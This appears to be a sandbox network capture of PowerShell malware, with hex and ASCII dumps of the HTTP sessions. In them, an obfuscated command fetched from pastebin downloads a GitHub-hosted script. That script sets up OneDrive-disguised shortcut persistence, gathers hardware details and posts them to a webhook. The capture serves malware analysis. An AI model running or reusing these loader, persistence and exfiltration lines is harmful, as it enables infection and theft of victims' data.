                                                                Oct 15, 2024 16:00:47.067806959 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: pastebin.com
                                                                Connection: Keep-Alive
                                                                Oct 15, 2024 16:00:47.667251110 CEST472INHTTP/1.1 301 Moved Permanently
                                                                Date: Tue, 15 Oct 2024 14:00:47 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 167
                                                                Connection: keep-alive
                                                                Cache-Control: max-age=3600
                                                                Expires: Tue, 15 Oct 2024 15:00:47 GMT
                                                                Location: https://pastebin.com/raw/sA04Mwk2
                                                                Server: cloudflare
                                                                CF-RAY: 8d3056617d816c37-DFW
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                11192.168.2.752162185.199.109.133804240C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 15, 2024 16:00:48.734690905 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: raw.githubusercontent.com
                                                                Connection: Keep-Alive
                                                                Oct 15, 2024 16:00:49.334247112 CEST541INHTTP/1.1 301 Moved Permanently
                                                                Connection: close
                                                                Content-Length: 0
                                                                Server: Varnish
                                                                Retry-After: 0
                                                                Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                Accept-Ranges: bytes
                                                                Date: Tue, 15 Oct 2024 14:00:49 GMT
                                                                Via: 1.1 varnish
                                                                X-Served-By: cache-dfw-kdal2120119-DFW
                                                                X-Cache: HIT
                                                                X-Cache-Hits: 0
                                                                X-Timer: S1729000849.272230,VS0,VE0
                                                                Access-Control-Allow-Origin: *
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Expires: Tue, 15 Oct 2024 14:05:49 GMT
                                                                Vary: Authorization,Accept-Encoding


                                                                HTTPS Proxied Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.749753104.20.3.2354436448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-15 14:00:11 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: pastebin.com
                                                                Connection: Keep-Alive
                                                                2024-10-15 14:00:12 UTC397INHTTP/1.1 200 OK
                                                                Date: Tue, 15 Oct 2024 14:00:11 GMT
                                                                Content-Type: text/plain; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                x-frame-options: DENY
                                                                x-content-type-options: nosniff
                                                                x-xss-protection: 1;mode=block
                                                                cache-control: public, max-age=1801
                                                                CF-Cache-Status: HIT
                                                                Age: 461
                                                                Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                                Server: cloudflare
                                                                CF-RAY: 8d305581fd912cd0-DFW
                                                                2024-10-15 14:00:12 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                2024-10-15 14:00:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.749754104.20.3.2354437180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-15 14:00:11 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: pastebin.com
                                                                Connection: Keep-Alive
                                                                2024-10-15 14:00:12 UTC397INHTTP/1.1 200 OK
                                                                Date: Tue, 15 Oct 2024 14:00:11 GMT
                                                                Content-Type: text/plain; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                x-frame-options: DENY
                                                                x-content-type-options: nosniff
                                                                x-xss-protection: 1;mode=block
                                                                cache-control: public, max-age=1801
                                                                CF-Cache-Status: HIT
                                                                Age: 461
                                                                Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                                Server: cloudflare
                                                                CF-RAY: 8d3055820e9c474b-DFW
                                                                2024-10-15 14:00:12 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                2024-10-15 14:00:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.749752104.20.3.2354437352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-15 14:00:11 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: pastebin.com
                                                                Connection: Keep-Alive
                                                                2024-10-15 14:00:12 UTC397INHTTP/1.1 200 OK
                                                                Date: Tue, 15 Oct 2024 14:00:11 GMT
                                                                Content-Type: text/plain; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                x-frame-options: DENY
                                                                x-content-type-options: nosniff
                                                                x-xss-protection: 1;mode=block
                                                                cache-control: public, max-age=1801
                                                                CF-Cache-Status: HIT
                                                                Age: 461
                                                                Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                                Server: cloudflare
                                                                CF-RAY: 8d3055820d012e71-DFW
                                                                2024-10-15 14:00:12 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                2024-10-15 14:00:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.749755104.20.3.2354437172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-15 14:00:11 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: pastebin.com
                                                                Connection: Keep-Alive
                                                                2024-10-15 14:00:12 UTC397INHTTP/1.1 200 OK
                                                                Date: Tue, 15 Oct 2024 14:00:11 GMT
                                                                Content-Type: text/plain; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                x-frame-options: DENY
                                                                x-content-type-options: nosniff
                                                                x-xss-protection: 1;mode=block
                                                                cache-control: public, max-age=1801
                                                                CF-Cache-Status: HIT
                                                                Age: 461
                                                                Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                                Server: cloudflare
                                                                CF-RAY: 8d3055822d912e1f-DFW
                                                                2024-10-15 14:00:12 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                2024-10-15 14:00:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.749769185.199.109.1334437180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-15 14:00:14 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: raw.githubusercontent.com
                                                                Connection: Keep-Alive
                                                                2024-10-15 14:00:14 UTC901INHTTP/1.1 200 OK
                                                                Connection: close
                                                                Content-Length: 7508
                                                                Cache-Control: max-age=300
                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                Content-Type: text/plain; charset=utf-8
                                                                ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                Strict-Transport-Security: max-age=31536000
                                                                X-Content-Type-Options: nosniff
                                                                X-Frame-Options: deny
                                                                X-XSS-Protection: 1; mode=block
                                                                X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                Accept-Ranges: bytes
                                                                Date: Tue, 15 Oct 2024 14:00:14 GMT
                                                                Via: 1.1 varnish
                                                                X-Served-By: cache-dfw-kdal2120107-DFW
                                                                X-Cache: HIT
                                                                X-Cache-Hits: 1
                                                                X-Timer: S1729000814.164888,VS0,VE3
                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                Access-Control-Allow-Origin: *
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                X-Fastly-Request-ID: fea4fcae6ca70ebe74ead29d8656c720b34000e2
                                                                Expires: Tue, 15 Oct 2024 14:05:14 GMT
                                                                Source-Age: 20
                                                                2024-10-15 14:00:14 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                2024-10-15 14:00:14 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                2024-10-15 14:00:14 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                2024-10-15 14:00:14 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                2024-10-15 14:00:14 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                2024-10-15 14:00:14 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.749770185.199.109.1334436448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-15 14:00:14 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: raw.githubusercontent.com
                                                                Connection: Keep-Alive
                                                                2024-10-15 14:00:14 UTC901INHTTP/1.1 200 OK
                                                                Connection: close
                                                                Content-Length: 7508
                                                                Cache-Control: max-age=300
                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                Content-Type: text/plain; charset=utf-8
                                                                ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                Strict-Transport-Security: max-age=31536000
                                                                X-Content-Type-Options: nosniff
                                                                X-Frame-Options: deny
                                                                X-XSS-Protection: 1; mode=block
                                                                X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                Accept-Ranges: bytes
                                                                Date: Tue, 15 Oct 2024 14:00:14 GMT
                                                                Via: 1.1 varnish
                                                                X-Served-By: cache-dfw-kdfw8210167-DFW
                                                                X-Cache: HIT
                                                                X-Cache-Hits: 1
                                                                X-Timer: S1729000814.165803,VS0,VE1
                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                Access-Control-Allow-Origin: *
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                X-Fastly-Request-ID: 1f41d85daf4b1962869cd606e3ca947d2409ff70
                                                                Expires: Tue, 15 Oct 2024 14:05:14 GMT
                                                                Source-Age: 20
                                                                2024-10-15 14:00:14 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                2024-10-15 14:00:14 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                2024-10-15 14:00:14 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
